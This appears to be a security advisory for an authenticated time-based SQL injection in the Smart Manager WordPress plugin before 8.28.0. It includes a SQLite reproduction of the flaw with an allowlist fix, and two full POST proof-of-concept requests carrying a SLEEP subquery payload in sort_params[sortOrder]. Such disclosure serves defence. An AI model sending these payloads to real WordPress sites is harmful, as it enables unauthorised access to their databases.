Smart Manager < 8.28.0 - Admin+ SQL Injection

Description

The plugin does not properly sanitise and escape the sort_params[sortOrder] parameter of the get_data_model AJAX command before using it in a SQL statement (the proof of concept appends a subquery after a legal "asc" direction, which is the shape of an ORDER BY injection), leading to a SQL injection exploitable by high privilege users such as admin. The request goes through admin-ajax.php and carries the plugin's security nonce, so a valid authenticated administrator session is required; the impact is that such a user can run arbitrary SQL against the WordPress database rather than only the queries the plugin intends.
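The following is an added example, not code from the plugin or the advisory, that reproduces the flaw class in miniature so the mechanics of the PoC payload are visible: a sort direction is concatenated into ORDER BY verbatim, so the payload string from the advisory is executed as SQL, while an allowlist on the direction rejects it. SQLite has no SLEEP(), so a stand-in sleep() function that records its call is registered in place of MySQL's real delay; the schema, rows and function names are constructed for this example.

```python
import sqlite3

# Constructed sample schema and rows (not from the advisory): a miniature of the
# WordPress posts/postmeta tables that the PoC's table_model joins.
SCHEMA = """
CREATE TABLE posts (ID INTEGER PRIMARY KEY, post_type TEXT, post_title TEXT);
CREATE TABLE postmeta (post_id INTEGER, meta_key TEXT, meta_value TEXT);
INSERT INTO posts VALUES (1, 'product', 'Alpha'), (2, 'product', 'Bravo'), (3, 'product', 'Charlie');
INSERT INTO postmeta VALUES (1, '_tax_status', 'taxable'), (2, '_tax_status', 'none'), (3, '_tax_status', 'shipping');
"""

# The advisory's sort_params[sortOrder] value, URL-decoded.
INJECTED_SORT_ORDER = "asc,(select*from(select(sleep(20)))a)"

SLEEP_CALLS = []

def _fake_sleep(seconds):
    # Stand-in for MySQL SLEEP(): record the call instead of blocking, so the
    # example shows that the injected subquery really is evaluated by the engine.
    SLEEP_CALLS.append(seconds)
    return 0

def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.create_function("sleep", 1, _fake_sleep)
    return con

BASE_QUERY = (
    "SELECT posts.ID, postmeta.meta_value FROM posts "
    "JOIN postmeta ON postmeta.post_id = posts.ID "
    "WHERE postmeta.meta_key = '_tax_status' "
    "ORDER BY postmeta.meta_value "
)

def vulnerable_query(con, sort_order):
    """Flaw class from the advisory: the sort direction is concatenated into ORDER BY verbatim."""
    return con.execute(BASE_QUERY + sort_order).fetchall()

# ORDER BY direction cannot be bound as a query parameter, so the fix is an allowlist.
ALLOWED_SORT_ORDERS = {"asc": "ASC", "desc": "DESC"}

def hardened_query(con, sort_order):
    """Fix: only a value from the allowlist ever reaches the SQL string."""
    direction = ALLOWED_SORT_ORDERS.get(sort_order.strip().lower())
    if direction is None:
        raise ValueError(f"invalid sort order: {sort_order!r}")
    return con.execute(BASE_QUERY + direction).fetchall()

def demo():
    """Run the PoC payload through both variants and report what happened."""
    con = connect()
    SLEEP_CALLS.clear()
    rows = vulnerable_query(con, INJECTED_SORT_ORDER)
    injected_ran = bool(SLEEP_CALLS) and all(s == 20 for s in SLEEP_CALLS)
    try:
        hardened_query(con, INJECTED_SORT_ORDER)
        blocked = False
    except ValueError:
        blocked = True
    return {"rows": rows, "injected_subquery_executed": injected_ran, "hardened_rejects": blocked}

if __name__ == "__main__":
    print(demo())
```

The vulnerable variant still returns the expected rows, which is why the bug is blind: the only observable effect of the extra ORDER BY term is the side effect (a delay on MySQL) that the advisory's verification step measures.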

Proof of Concept

The vulnerability can be demonstrated using the following POST request:

POST /wp-admin/admin-ajax.php?action=sm_beta_include_file HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/admin.php?page=smart-manager
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1117
Origin: http://localhost
Connection: close
Cookie: <authenticated admin session cookie, omitted from the published request>
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

cmd=get_data_model&active_module=product&security=37e8d818b7&is_public=1&sm_page=1&sm_limit=50&SM_IS_WOO30=true&sort_params%5Bcolumn%5D=postmeta%2Fmeta_key%3D_tax_status%2Fmeta_value%3D_tax_status&sort_params%5BsortOrder%5D=asc%2c(select*from(select(sleep(20)))a)&table_model%5Bposts%5D%5Bpkey%5D=ID&table_model%5Bposts%5D%5Bjoin_on%5D=&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product_variation&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_status%5D=any&table_model%5Bpostmeta%5D%5Bpkey%5D=post_id&table_model%5Bpostmeta%5D%5Bjoin_on%5D=postmeta.post_ID+%3D+posts.ID&table_model%5Bterm_relationships%5D%5Bpkey%5D=object_id&table_model%5Bterm_relationships%5D%5Bjoin_on%5D=term_relationships.object_id+%3D+posts.ID&table_model%5Bterm_taxonomy%5D%5Bpkey%5D=term_taxonomy_id&table_model%5Bterm_taxonomy%5D%5Bjoin_on%5D=term_taxonomy.term_taxonomy_id+%3D+term_relationships.term_taxonomy_id&table_model%5Bterms%5D%5Bpkey%5D=term_id&table_model%5Bterms%5D%5Bjoin_on%5D=terms.term_id+%3D+term_taxonomy.term_id&search_text=&advanced_search_query=%5B%5D&is_view=0&isTasks=0&is_taxonomy=0


Verification Method:

Run the request against a WordPress instance running Smart Manager v8.27.0 (the last affected release) from an authenticated administrator session, replacing the security nonce and the session cookie with values taken from your own session: WordPress nonces are bound to the user and expire, so the literal values in the request above will not validate on another instance.

If the server response is delayed by approximately 20 seconds relative to the same request with sort_params[sortOrder]=asc, the injected SLEEP(20) subquery was executed, confirming the time-based SQL injection.


---

The same parameter is also injectable through the post module (active_module=post), where it lands in a different SQL query; the following PoC uses a 5 second sleep instead of 20:

POST /wp-admin/admin-ajax.php?action=sm_beta_include_file HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
Content-Length: 1037
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: text/plain, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://wpscan-vulnerability-test-bench.ddev.site
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin.php?page=smart-manager
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i

cmd=get_data_model&active_module=post&security=14148c8e02&is_public=1&sm_page=1&sm_limit=50&SM_IS_WOO30=&sort_params%5Bcolumn%5D=postmeta%2Fmeta_key%3D_elementor_data%2Fmeta_value%3D_elementor_data&sort_params%5BsortOrder%5D=asc%2c(select*from(select(sleep(5)))a)&table_model%5Bposts%5D%5Bpkey%5D=ID&table_model%5Bposts%5D%5Bjoin_on%5D=&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D=post&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_status%5D=any&table_model%5Bpostmeta%5D%5Bpkey%5D=post_id&table_model%5Bpostmeta%5D%5Bjoin_on%5D=postmeta.post_ID+%3D+posts.ID&table_model%5Bterm_relationships%5D%5Bpkey%5D=object_id&table_model%5Bterm_relationships%5D%5Bjoin_on%5D=term_relationships.object_id+%3D+posts.ID&table_model%5Bterm_taxonomy%5D%5Bpkey%5D=term_taxonomy_id&table_model%5Bterm_taxonomy%5D%5Bjoin_on%5D=term_taxonomy.term_taxonomy_id+%3D+term_relationships.term_taxonomy_id&table_model%5Bterms%5D%5Bpkey%5D=term_id&table_model%5Bterms%5D%5Bjoin_on%5D=terms.term_id+%3D+term_taxonomy.term_id&search_text=&advanced_search_query=%5B%5D

Classification

Type
SQLI

Miscellaneous

Original Researcher
Ivan Spiridonov
Submitter
Ivan Spiridonov
Verified
Yes

Timeline

Publicly Published
2024-01-18
Added
2024-01-18
Last Updated
2024-01-18
